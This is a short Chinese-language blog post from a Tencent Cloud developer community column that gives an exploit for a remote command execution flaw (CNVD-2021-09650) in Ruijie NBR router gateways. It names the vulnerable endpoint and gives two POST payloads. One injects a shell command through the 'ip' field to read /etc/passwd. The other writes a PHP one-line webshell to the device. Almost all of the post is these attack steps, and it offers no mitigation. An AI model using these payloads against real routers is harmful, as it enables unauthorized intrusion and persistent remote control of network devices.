前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >锐捷NBR路由器 远程命令执行漏洞 CNVD-2021-09650

锐捷NBR路由器 远程命令执行漏洞 CNVD-2021-09650

原创
作者头像
Khan安全团队
发布2022-01-04 09:22:51
5.1K0
发布2022-01-04 09:22:51
举报
文章被收录于专栏:Khan安全团队

锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。

我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt

利用此漏洞我们可以将一句话木马写入shell

Payload :

mac=1&ip=192.168.1.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > shell.php

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档